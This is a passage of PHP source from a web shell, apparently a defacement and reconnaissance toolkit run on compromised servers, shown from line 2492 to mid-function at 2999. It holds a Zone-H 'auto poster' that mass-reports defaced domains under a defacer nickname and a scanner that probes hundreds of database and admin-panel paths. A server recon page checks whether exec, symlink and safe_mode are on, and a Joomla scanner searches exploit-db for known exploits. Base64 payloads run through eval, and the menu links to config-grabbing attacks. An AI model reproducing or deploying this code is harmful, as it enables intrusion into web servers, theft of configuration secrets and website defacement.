  2492. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  2493. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  2494. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  2495. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  2496. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  2497. $HOSTOWNED1 = "HOST OWNED :";
  2498. echo ''. $HOSTOWNED1 .'' ;
  2499. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  2500.  
  2501.  
  2502. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  2503. echo ''. $REPORTERROR .'</a></span></footer>';
  2504. echo ''. $THEEND .'' ;
  2505. exit;}
  2506. /////////////////// ZONE-H
  2507. if ($_GET['Mister'] == 'Zoneh') {
  2508. $FOTTER2 = "<footer class='MK-footer'>";  
  2509. echo ''. $FOTTER2 .'' ;
  2510. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  2511. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  2512. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  2513. $SERVERIP1 = "SERVER IP :";
  2514. echo ''. $SERVERIP1 .'' ;
  2515. $SPAN2 = "<span style='color:#FFFFFF;'>";
  2516. $SPAN3 = "</span>";
  2517. echo ''. $SPAN2 .'' ;
  2518. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  2519. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  2520. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  2521. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  2522. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  2523. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  2524. $HOSTOWNED1 = "HOST OWNED :";
  2525. echo ''. $HOSTOWNED1 .'' ;
  2526. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  2527.  
  2528.  
  2529. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  2530. echo ''. $REPORTERROR .'</a></span></footer>';
  2531. echo ''. $THEEND .'' ;
  2532. echo "<br><nav class='Mister-nav'><center><span style='font-size:18px;color:#0078FF'>ZONE-H AUTO POSTER</span></nav><br><div class=content><center>";
  2533. $defacer='YOUR NICK NAME';$display_details=0;$method=14;$reason=5;error_reporting(0);set_time_limit(0);if(!function_exists('curl_init')){echo "CURL ERROR\n";exit;}$cli=(isset($argv[0]))?1:0;if($cli==1){$file=$argv[1];$sites=file($file);}if(function_exists(apache_setenv)){@apache_setenv('no-gzip', 1);}@ini_set('zlib.output_compression', 0);@ini_set('implicit_flush', 1);@ob_implicit_flush(true);@ob_end_flush();if(isset($_POST['domains'])){$sites=explode("\n",$_POST['domains']);}if (FILE_EXISTS($_FILES["file"]["tmp_name"])){$file=$_FILES["file"]["tmp_name"];$sites=file($file);}
  2534. if(!isset($_POST['defacer'])){
  2535. echo <<<EOF
  2536. <form enctype="multipart/form-data" method="POST"><div align='center'><br>
  2537. CONECT TO : <span style='color:white'> HTTP://WWW.ZONE-H.ORG/NOTIFY/MASS</span>
  2538. <span style='color:white'><br> DEFACER : <br></span></b></span><input name="defacer" type="text" value="$defacer" style="width:40%" class="input"><br/><table width='40%' ><tr><td align='center'><span lang='en-us'><span style='color:#FFFFFF'><br>DOMAINS : </span></span><p align='center'><textarea rows='10' name='domains' placeholder='PASTE YOUR DOMAINS HERE' cols='50' class="input" style="height:100px;"></textarea><br><br><input name="submit"  type="submit" value='SEND' class="Mister-button"><br><br></p></td></tr></form></div>
  2539. EOF;
  2540. }$defacer=$_POST['defacer'];if(!$sites){echo '</pre>';exit;} echo "<br><br><center><span style='font-size:11px;  color:#FFFFFF'> TOTAL UNIQUE DOMAIN</span><br> $total\n\n";$sites=array_unique(str_replace('http://','',$sites));$total=count($sites);$pause=10;$start=time();$main=curl_multi_init();for($m=0;$m<3;$m++){$http[] = curl_init();}for($n=0;$n<$total;$n +=30){if($display_details==1){for($x=0;$x<30;$x++){echo'<br>[+] ADDING <br>'.rtrim($sites[$n+$x]).'';echo "\n";}}$d=$n+30;if($d>$total){$d=$total;}echo "<br><br><br><br>[$d/$total]\n";for($w=0;$w<3;$w++){$p=$w * 10;if(!(isset($sites[$n+$p]))){$pause=$w;break;}$posts[$w]="defacer=$defacer&domain1=http%3A%2F%2F".rtrim($sites[$n+$p])."&domain2=http%3A%2F%2F".rtrim($sites[$n+$p+1])."&domain3=http%3A%2F%2F".rtrim($sites[$n+$p+2])."&domain4=http%3A%2F%2F".rtrim($sites[$n+$p+3])."&domain5=http%3A%2F%2F".rtrim($sites[$n+$p+4])."&domain6=http%3A%2F%2F".rtrim($sites[$n+$p+5])."&domain7=http%3A%2F%2F".rtrim($sites[$n+$p+6])."&domain8=http%3A%2F%2F".rtrim($sites[$n+$p+7])."&domain9=http%3A%2F%2F".rtrim($sites[$n+$p+8])."&domain10=http%3A%2F%2F".rtrim($sites[$n+$p+9])."&hackmode=".$method."&reason=".$reason."&submit=Send";$curlopt=array(CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 6.1;WOW64) AppleWebKit/535.16 (KHTML, like Gecko) Chrome/18.0.1003.1 Safari/535.16',CURLOPT_RETURNTRANSFER => true,CURLOPT_FOLLOWLOCATION =>true,CURLOPT_ENCODING => true,CURLOPT_HEADER => false,CURLOPT_HTTPHEADER => array("Keep-Alive: 7"),CURLOPT_CONNECTTIMEOUT => 3,CURLOPT_URL => 'http://www.zone-h.org/notify/mass',CURLOPT_POSTFIELDS => $posts[$w]);curl_setopt_array($http[$w],$curlopt);curl_multi_add_handle($main,$http[$w]);}$running = null;do{curl_multi_exec($main,$running);}while($running > 0);for($m=0;$m<3;$m++){if($pause==$m){break;}curl_multi_remove_handle($main, $http[$m]);$code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE);if ($code != 200) {while(true){echo' <br><span style="color:red">ERROR RETRYING.... </span><br>';echo "\n";sleep(5);curl_exec($http[$m]);$code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE);if( $code== 200){break 1;}}}}}$end= time() - $start;echo 'Done';echo "\n\n[*]Time: $end seconds\n";curl_multi_close($main);if($cli==0){echo '</body></html>';}
  2541. exit;}
  2542. //////////// FINDER
  2543. if ($_GET['Mister'] == 'Finder') {
  2544. echo "<br><center><nav class='social'><ul>
  2545. <li><a href='?Mister=FinderAdmin'>Finder Administer Panel V1.0</a></li>
  2546. <li><a href='?Mister=Domains'>Get All Domains</a></li>
  2547. <li><a href='?Mister=Finder'>Finder Database Panel</a></li>
  2548. <li><a href='?Mister=Getip'>Get Ip 2 Domains </a></li>
  2549. <li><a href='?Mister=subdomain'>Subdomain Checker</a></li>
  2550. <li><a href='?Mister=iplookdom'>Ip Lookup Reverse</a></li>
  2551. <li><a href='?Mister=Rev'>Mass Read Config </a></li>
  2552. <li><a href='?Mister=Grabber'>Grabber Config Attack</a></li>
  2553. <li><a href='?Mister=J-Scann3r'>Joomla Serv3r Scann3r</a></li>
  2554. <li><a href='?Mister=whois'>Website Whois</a></li>
  2555. </ul></nav></center>";
  2556. echo "<nav class='Mister-nav'><center><span style='font-size:18px;  color:#0078FF'>FIND DATABASE PANELS</span></nav><br><div class=content><center>";
  2557. ?>
  2558. <form action ="" method="post">
  2559. <span style="color:white"><center>URL :</center></span>
  2560. <center><input type="text" name="site" class="input" alt="username" value="<?php echo "".$_SERVER['HTTP_HOST']."";?>" style="width:40%"><br><br>
  2561. <input type = "submit" value="FIND" class="Mister-button"></center>
  2562. </form></td>
  2563. <?php
  2564. $site = $_POST['site'];
  2565. $list = array(
  2566. '/phpmyadmin/',
  2567. '/PMA/',
  2568. '/pma/',
  2569. '/admin/',
  2570. '/dbadmin/',
  2571. '/DB_ADMIN/',
  2572. '/db_admin/',
  2573. '/DBA/',
  2574. '/SQLI/',
  2575. '/dba/',
  2576. '/sqli/',
  2577. '/myadmin/',
  2578. '/phpmyadmin2/',
  2579. '/phpMyAdmin2/',
  2580. '/phpMyAdmin-2/',
  2581. '/php-my-admin/',
  2582. '/phpMyAdmin-2.2.3/',
  2583. '/phpMyAdmin-2.2.6/',
  2584. '/phpMyAdmin-2.5.1/',
  2585. '/phpMyAdmin-2.5.4/',
  2586. '/phpMyAdmin-2.5.5-rc1/',
  2587. '/phpMyAdmin-2.5.5-rc2/',
  2588. '/phpMyAdmin-2.5.5/',
  2589. '/phpMyAdmin-2.5.5-pl1/',
  2590. '/phpMyAdmin-2.5.6-rc1/',
  2591. '/phpMyAdmin-2.5.6-rc2/',
  2592. '/phpMyAdmin-2.5.6/',
  2593. '/phpMyAdmin-2.5.7/',
  2594. '/phpMyAdmin-2.5.7-pl1/',
  2595. '/phpMyAdmin-2.6.0-alpha/',
  2596. '/phpMyAdmin-2.6.0-alpha2/',
  2597. '/phpMyAdmin-2.6.0-beta1/',
  2598. '/phpMyAdmin-2.6.0-beta2/',
  2599. '/phpMyAdmin-2.6.0-rc1/',
  2600. '/phpMyAdmin-2.6.0-rc2/',
  2601. '/phpMyAdmin-2.6.0-rc3/',
  2602. '/phpMyAdmin-2.6.0/',
  2603. '/phpMyAdmin-2.6.0-pl1/',
  2604. '/phpMyAdmin-2.6.0-pl2/',
  2605. '/phpMyAdmin-2.6.0-pl3/',
  2606. '/phpMyAdmin-2.6.1-rc1/',
  2607. '/phpMyAdmin-2.6.1-rc2/',
  2608. '/phpMyAdmin-2.6.1/',
  2609. '/phpMyAdmin-2.6.1-pl1/',
  2610. '/phpMyAdmin-2.6.1-pl2/',
  2611. '/phpMyAdmin-2.6.1-pl3/',
  2612. '/phpMyAdmin-2.6.2-rc1/',
  2613. '/phpMyAdmin-2.6.2-beta1/',
  2614. '/phpMyAdmin-2.6.2-rc1/',
  2615. '/phpMyAdmin-2.6.2/',
  2616. '/phpMyAdmin-2.6.2-pl1/',
  2617. '/phpMyAdmin-2.6.3/',
  2618. '/phpMyAdmin-2.6.3-rc1/',
  2619. '/phpMyAdmin-2.6.3/',
  2620. '/phpMyAdmin-2.6.3-pl1/',
  2621. '/phpMyAdmin-2.6.4-rc1/',
  2622. '/phpMyAdmin-2.6.4-pl1/',
  2623. '/phpMyAdmin-2.6.4-pl2/',
  2624. '/phpMyAdmin-2.6.4-pl3/',
  2625. '/phpMyAdmin-2.6.4-pl4/',
  2626. '/phpMyAdmin-2.6.4/',
  2627. '/phpMyAdmin-2.7.0-beta1/',
  2628. '/phpMyAdmin-2.7.0-rc1/',
  2629. '/phpMyAdmin-2.7.0-pl1/',
  2630. '/phpMyAdmin-2.7.0-pl2/',
  2631. '/phpMyAdmin-2.7.0/',
  2632. '/phpMyAdmin-2.8.0-beta1/',
  2633. '/phpMyAdmin-2.8.0-rc1/',
  2634. '/phpMyAdmin-2.8.0-rc2/',
  2635. '/phpMyAdmin-2.8.0/',
  2636. '/phpMyAdmin-2.8.0.1/',
  2637. '/phpMyAdmin-2.8.0.2/',
  2638. '/phpMyAdmin-2.8.0.3/',
  2639. '/phpMyAdmin-2.8.0.4/',
  2640. '/phpMyAdmin-2.8.1-rc1/',
  2641. '/phpMyAdmin-2.8.1/',
  2642. '/phpMyAdmin-2.8.2/',
  2643. '/sqlmanager/',
  2644. '/mysqlmanager/',
  2645. '/p/m/a/',
  2646. '/PMA2005/',
  2647. '/pma2005/',
  2648. '/dev/',
  2649. '/phpmanager/',
  2650. '/php-myadmin/',
  2651. '/phpmy-admin/',
  2652. '/webadmin/',
  2653. '/sqlweb/',
  2654. '/websql/',
  2655. '/webdb/',
  2656. '/mysqladmin/',
  2657. '/mysql-admin/',
  2658. '/mya/',
  2659. '/myadmin/',
  2660. '/mysql/',
  2661. '/sql/',
  2662. '/server/',
  2663. '/db/',
  2664. '/database/',
  2665. '/databases/',
  2666. '/adm/',
  2667. '/configuration/',
  2668. '/configure/',
  2669. '/administrator/',
  2670. '/login/',
  2671. '/moderator/',
  2672. '/controlpanel/',
  2673. '/adminpanel/',
  2674. '/admincontrol/',
  2675. '/fileadmin/',
  2676. '/data/',
  2677. '/postgresql/',
  2678. '/oracle/',
  2679. '/msssql/',
  2680. '/msaccess/',
  2681. '/sysadmin/',
  2682. '/serverdata/',
  2683. '/webadmin/',
  2684. '/admins/',
  2685. '/Database_Administration/',
  2686. '/WebAdmin/',
  2687. '/useradmin/',
  2688. '/sysadmins/',
  2689. '/admin1/',
  2690. '/system-administration/',
  2691. '/administrators/',
  2692. '/pgadmin/',
  2693. '/DIRectadmin/',
  2694. '/staradmin/',
  2695. '/ServerAdministrator/',
  2696. '/SysAdmin/',
  2697. '/administer/',
  2698. '/LiveUser_Admin/',
  2699. '/sys-admin/',
  2700. '/typo3/',
  2701. '/panel/',
  2702. '/xlogin/',
  2703. '/smblogin/',
  2704. '/phpldapadmin/',
  2705. '/server_admin/',
  2706. '/database_administration/',
  2707. '/system_administration/',
  2708. '/ss_vms_admin_sm/',
  2709. '/adminarea/',
  2710. '/MySQL/',
  2711. '/mysql_admin/',
  2712. '/server_data/',
  2713. '/DB/',
  2714. '/DB1/',
  2715. '/DB2/',
  2716. '/DB3/',
  2717. '/DB4/',
  2718. '/DB5/',
  2719. '/DB6/',
  2720. '/DB7/',
  2721. '/DB8/',
  2722. '/DB9/',
  2723. '/DB0/',
  2724. '/db1/',
  2725. '/db2/',
  2726. '/db3/',
  2727. '/db4/',
  2728. '/db5/',
  2729. '/db6/',
  2730. '/db7/',
  2731. '/db8/',
  2732. '/db9/',
  2733. '/db0/',
  2734. '/mysql5/',
  2735. '/mysql4/',
  2736. '/root/',
  2737. '/apache/',
  2738. '/php/',
  2739. '/Apache/',
  2740. '/Php/',
  2741. '/apach/',
  2742. '/apachepanel/',
  2743. '/WEBSERVERS/',
  2744. '/DATABASE1/',
  2745. '/DATABASE2/',
  2746. '/DATABASE3/',
  2747. '/DATABASE4/',
  2748. '/DATABASE5/',
  2749. '/DATABASE6/',
  2750. '/DATABASE7/',
  2751. '/DATABASE8/',
  2752. '/DATABASE9/',
  2753. '/WEBDATA/',
  2754. '/WEB_DATA/',
  2755. '/webservers/',
  2756. '/database1/',
  2757. '/database2/',
  2758. '/database3/',
  2759. '/database4/',
  2760. '/database5/',
  2761. '/database6/',
  2762. '/database7/',
  2763. '/database8/',
  2764. '/database9/',
  2765. '/webdata/',
  2766. '/web_data/',
  2767. );
  2768. if(isset($site)){
  2769. foreach($list as $path => $test) {
  2770. $ch = curl_init();
  2771. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2772. curl_setopt($ch, CURLOPT_HEADER, 1);
  2773. curl_setopt($ch, CURLOPT_URL, $site.$test);
  2774. $result = curl_exec($ch);
  2775. curl_close($ch);
  2776. //print $url;
  2777. if (preg_match("/200 OK/", $result)){
  2778. echo "<br><span style='color:#0078FF'>[+]</span><span style='color:white'> FOUND : </span><span><a>[ <a target=_white style='color:#0078FF'>$site$test </span>]</a></span>";
  2779. }
  2780. else       if (preg_match("/401 Unauthorized/", $result)) {
  2781. echo "<br><span style='color:#0078FF'>[+]</span><span style='color:white'> FOUND : </span><span><a>[ <a target=_white style='color:#0078FF'>$site$test </span>]</a></span>";
  2782. }
  2783. }
  2784. echo "<center><br><span style='font-size:11px;  color:#0078FF'><b>SCAN FINISHED</b></center><br>";}
  2785. echo "<br>";$FOTTER2 = "<footer class='MK-footer'>";  
  2786. echo ''. $FOTTER2 .'' ;
  2787. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  2788. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  2789. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  2790. $SERVERIP1 = "SERVER IP :";
  2791. echo ''. $SERVERIP1 .'' ;
  2792. $SPAN2 = "<span style='color:#FFFFFF;'>";
  2793. $SPAN3 = "</span>";
  2794. echo ''. $SPAN2 .'' ;
  2795. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  2796. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  2797. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  2798. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  2799. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  2800. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  2801. $HOSTOWNED1 = "HOST OWNED :";
  2802. echo ''. $HOSTOWNED1 .'' ;
  2803. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  2804. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  2805. echo ''. $REPORTERROR .'</a></span></footer>';
  2806. echo ''. $THEEND .'' ;
  2807. exit;}
  2808. //////////// INFOSERV
  2809. if ($_GET['Mister'] == 'infoserv'){
  2810. echo "<br><nav class='Mister-nav'><center><span style='font-size:18px;  color:#0078FF'>SAFE MODES</span></nav><div class=content>";
  2811. ////////////// SAFE MODES
  2812. if(ini_get('safe_mode') == '1'){
  2813. echo '<span style="color:#FFFFFF;">&check; SAFE MODE : </span><span style=" color:#0078FF"> ON</span><br>';
  2814. }else{
  2815. echo '<span style="color:#FFFFFF;">&check; SAFE MODE : </span><span style=" color:#f60000"> OFF</span><br>';
  2816. }
  2817. if(ini_get('magic_quotes_gpc') == '1'){
  2818. echo '<span style="color:#FFFFFF;">&check; MAGIC_QUOTES_GPC :</span><span style=" color:#0078FF"> ON</span><br>';
  2819. }else{
  2820. echo '<span style="color:#FFFFFF;">&check; MAGIC_QUOTES_GPC :</span><span style=" color:#f60000"> OFF</span><br>';
  2821. }
  2822. if(function_exists('mysql_connect')){
  2823. echo '<span style="color:#FFFFFF;">&check;  MYSQL :</span><span style=" color:#0078FF"> ON</span><br>';
  2824. }else{
  2825. echo '<span style="color:#FFFFFF;">&check;  MYSQL :</span><span style=" color:#f60000"> OFF</span><br>';
  2826. }
  2827. if(function_exists('mssql_connect')){
  2828. echo '<span style="color:#FFFFFF;">&check;  MSSQL:<span style=" color:#0078FF"> ON</span><br>';
  2829. }else{
  2830. echo '<span style="color:#FFFFFF;">&check; MSSQL:<span style=" color:#f60000"> OFF</span><br>';
  2831. }
  2832. if(function_exists('pg_connect')){
  2833. echo '<span style="color:#FFFFFF;">&check; POSTGRESQL:<span style=" color:#0078FF"> ON</span><br>';
  2834. }else{
  2835. echo '<span style="color:#FFFFFF;">&check; POSTGRESQL:<span style=" color:#f60000"> OFF</span><br>';
  2836. }
  2837. if(function_exists('ocilogon')){
  2838. echo '<span style="color:#FFFFFF;">&check; ORACLE: </span><span style=" color:#0078FF"> ON</span><br>';
  2839. }else{
  2840. echo '<span style="color:#FFFFFF;">&check;  ORACLE: </span><span style=" color:#f60000"> OFF</span><br>';
  2841. }
  2842. if(function_exists('curl_version')){
  2843. echo '<span style="color:#FFFFFF;">&check;  CURL:<span style=" color:#0078FF"> ON</span><br>';
  2844. }
  2845. else{
  2846. echo '<span style="color:#FFFFFF;">&check; CURL:</span><span style=" color:#f60000"> OFF</span><br>';
  2847. }
  2848. if(function_exists('exec')){
  2849. echo '<span style="color:#FFFFFF;">&check; EXEC:<span style=" color:#0078FF"> ON</span><br>';
  2850. }
  2851. else{
  2852. echo '<span style="color:#FFFFFF;">&check; EXEC:<span style=" color:#f60000"> OFF</span><br>';
  2853. }
  2854. if(!ini_get('open_baseDIR') != "on"){
  2855. echo '<span style="color:#FFFFFF;">&check; OPEN_BASEDIR:<span style=" color:#f60000"> OFF</span><br>';
  2856. }
  2857. else{
  2858. echo '<span style="color:#FFFFFF;">&check; OPEN_BASEDIR:<span style=" color:#0078FF"> ON</span><br>';
  2859. }
  2860. if(!ini_get('ini_restore') != "on"){
  2861. echo '<span style="color:#FFFFFF;">&check;  INI_RESTORE:<span style=" color:#f60000"> OFF</span><br>';
  2862. }
  2863. else{
  2864. echo '<span style="color:#FFFFFF;">&check; INI_RESTORE:<span style=" color:#0078FF"> ON</span><br>';
  2865. }
  2866. if(function_exists('symlink')){
  2867. echo '<span style="color:#FFFFFF;">&check; SYMLINK:<span style=" color:#0078FF"> ON</span><br>';
  2868. }
  2869. else{
  2870. echo '<span style="color:#FFFFFF;">&check; SYMLINK:<span style=" color:#f60000"> OFF</span><br>';
  2871. }
  2872. if(function_exists('file_get_contents')){
  2873. echo ' <span style="color:#FFFFFF;">&check; FILE_GET_CONTENTS:<span style=" color:#0078FF"> ON</span><br>';
  2874. }
  2875. else{
  2876. echo ' <span style="color:#FFFFFF;">&check; FILE_GET_CONTENTS:<span style=" color:#f60000"> OFF</span><br>';
  2877. }
  2878. if(IS_DIR('sim/rut')){
  2879. echo '<span style="color:#FFFFFF;">&check;  PERMISSION:<span style=" color:#0078FF"> ON</span><br>';
  2880. }
  2881. else{
  2882. echo '<span style="color:#FFFFFF;">&check;  PERMISSION:<span style=" color:red"> OFF</span><br>';
  2883. }
  2884. //////////// INFORMATIONS
  2885. ///// DISABLE FUNCTIONS
  2886. echo "<span style='color:#FFFFFF;'>&check; DISABLE FUNCTIONS : </span>";
  2887. if(''==($df=@ini_get('disable_functions'))){echo "<font color=#0078FF>NON</font> <br> ";}else{echo "<font color=red>$df</font><br>";}
  2888. define('SA_ROOT', str_replace('\\', '/', DIRname(__FILE__)).'/');
  2889. ////////
  2890. function getcfg($varname) {
  2891. $result = get_cfg_var($varname);
  2892. if ($result == 0) {return 'NO';
  2893. } elseif ($result == 1) {return 'YES';
  2894. } else {return $result;}}
  2895. ////
  2896. function p($str){
  2897. echo $str."\n";}
  2898. function formhead($arg = array()) {
  2899. if ($arg['title']) {
  2900. p('<h2>'.$arg['title'].' &raquo;</h2>');}}
  2901. //////
  2902. $upsize=getcfg('file_uploads') ? getcfg('upload_max_FILESIZE') : 'Not allowed';
  2903. !$dis_func && $dis_func = 'NO';
  2904. ///// SERVER
  2905. $info = array(
  2906.         1 => array(' &check; <span style="color:#FFFFFF;">SERVER TIME </span><span style="color:red;"> ',date('Y/m/d h:i:s',$timestamp)),
  2907.        
  2908.         2 => array('&check; <span style="color:#FFFFFF;">SERVER OS </span><span style="color:red;"> ',PHP_OS),
  2909.         3 => array('&check; <span style="color:#FFFFFF;">SERVER OS CHARSET </span><span style="color:red;"> ',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
  2910.         4 => array('&check; <span style="color:#FFFFFF;">PHP RUN MODE </span><span style="color:red;"> ',strtoupper(php_sapi_name())),
  2911. ///// PHP
  2912.         5 => array('&check; <span style="color:#FFFFFF;">PHP VERSION </span><span style="color:red;"> ',PHP_VERSION),
  2913.         6 => array('&check; <span style="color:#FFFFFF;">ADMINISTRATOR </span><span style="color:red;"> ',$adminmail),
  2914.         7 => array('&check; <span style="color:#FFFFFF;">ALLOW_URL_FOPEN </span><span style="color:red;"> ',getcfg('allow_url_fopen')),
  2915.         8 => array('&check; <span style="color:#FFFFFF;">ENABLE_DL </span> <span style="color:red;"> ',getcfg('enable_dl')),
  2916.         9 => array('&check; <span style="color:#FFFFFF;">DISPLAY_ERRORS </span> <span style="color:red;"> ',getcfg('display_errors')),
  2917.         10 => array('&check; <span style="color:#FFFFFF;">REGISTER_GLOBALS </span><span style="color:red;"> ',getcfg('register_globals')),
  2918.         11 => array('&check; <span style="color:#FFFFFF;">MAGIC_QUOTES_GPC </span><span style="color:red;"> ',getcfg('magic_quotes_gpc')),
  2919.         12 => array('&check; <span style="color:#FFFFFF;">MEMORY_LIMIT </span><span style="color:red;"> ',getcfg('memory_limit')),
  2920.         13 => array('&check; <span style="color:#FFFFFF;">POST_MAX_SIZE </span><span style="color:red;"> ',getcfg('post_max_size')),
  2921.         14 => array('&check; <span style="color:#FFFFFF;">UPLOAD_MAX_FILESIZE </span><span style="color:red;"> ',$upsize),);
  2922. if($phpvarname) {
  2923. m($phpvarname .' : '.getcfg($phpvarname));}
  2924. ///// SERVER
  2925. $hp = array(0=> '<span style="color:#FFFFFF;font-size:16px;">INFO SERVER</span>', 1=> '<span style="color:#FFFFFF;font-size:16px;">INFO PHP</span>');
  2926. for($a=0;$a<2;$a++) {
  2927. p('<h2><nav class="Mister-nav">'.$hp[$a].' &raquo;</h2>');
  2928. p('<ul class="info">');
  2929. if ($a==0) {
  2930. for($i=1;$i<=9;$i++) {
  2931. p('<li>'.$info[$i][0].':'.$info[$i][1].'</li>');}
  2932. } elseif
  2933. ($a == 1) {for($i=10;$i<=23;$i++) {
  2934. p('<li>'.$info[$i][0].':</u>'.$info[$i][1].'</li></nav>');}}
  2935. p('</ul>');}
  2936. $FOTTER2 = "<footer class='MK-footer'>";  
  2937. echo ''. $FOTTER2 .'' ;
  2938. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  2939. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  2940. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  2941. $SERVERIP1 = "SERVER IP :";
  2942. echo ''. $SERVERIP1 .'' ;
  2943. $SPAN2 = "<span style='color:#FFFFFF;'>";
  2944. $SPAN3 = "</span>";
  2945. echo ''. $SPAN2 .'' ;
  2946. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  2947. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  2948. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  2949. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  2950. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  2951. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  2952. $HOSTOWNED1 = "HOST OWNED :";
  2953. echo ''. $HOSTOWNED1 .'' ;
  2954. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  2955. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  2956. echo ''. $REPORTERROR .'</a></span></footer>';
  2957. echo ''. $THEEND .'' ;
  2958. exit;}
  2959. if ($_GET["Mister"] == "J-Scann3r"){
  2960. echo "<br><center><nav class='social'><ul>
  2961. <li><a href='?Mister=FinderAdmin'>Finder Administer Panel V1.0</a></li>
  2962. <li><a href='?Mister=Domains'>Get All Domains</a></li>
  2963. <li><a href='?Mister=Finder'>Finder Database Panel</a></li>
  2964. <li><a href='?Mister=Getip'>Get Ip 2 Domains </a></li>
  2965. <li><a href='?Mister=subdomain'>Subdomain Checker</a></li>
  2966. <li><a href='?Mister=iplookdom'>Ip Lookup Reverse</a></li>
  2967. <li><a href='?Mister=Rev'>Mass Read Config </a></li>
  2968. <li><a href='?Mister=Grabber'>Grabber Config Attack</a></li>
  2969. <li><a href='?Mister=J-Scann3r'>Joomla Serv3r Scann3r</a></li>
  2970. <li><a href='?Mister=whois'>Website Whois</a></li>
  2971. </ul></nav></center>";
  2972. echo '<nav class="Mister-nav"><center><span style="font-size:18px;color:#0078FF">JOOMLA SERV3R SCANN3R V2</span></nav><center><br><div class=content>
  2973. <form method="POST">';
  2974. ?>
  2975. <input type="text" name="site" value="<?php echo "".$_SERVER['HTTP_HOST']."";?>" style="width:50%;"><input type="submit" value="SCANN3" class="Mister-button"></p></form>
  2976. <?php
  2977. function check_exploit($Auto_Shearch){
  2978.     $link ="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$Auto_Shearch&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";
  2979.      
  2980.     $result = @file_get_contents($link);
  2981.      
  2982.     if (eregi("NO RESULTS",$result))  {
  2983.      
  2984.     echo"<td style='width:50%;'>NOT FOUND</td><td><a href='http://www.google.ma/#hl=en&q=download+$Auto_Shearch+joomla+extension'>DOWNLOAD</a></td></tr>";
  2985.      
  2986.     }else{
  2987.      
  2988.     echo"<td style='width:50%;'><a href='$link'>FOUND</a></td><td><=</td></tr>";
  2989.      
  2990.     }
  2991.     }
  2992.      
  2993.     function check_com($url){
  2994.      
  2995.     $source = @file_get_contents($url);
  2996.      
  2997.     preg_match_all('{option,(.*?)/}i',$source,$f);
  2998.     preg_match_all('{option=(.*?)(&amp;|&|")}i',$source,$f2);
  2999.     preg_match_all('{/components/(.*?)/}i',$source,$f3);
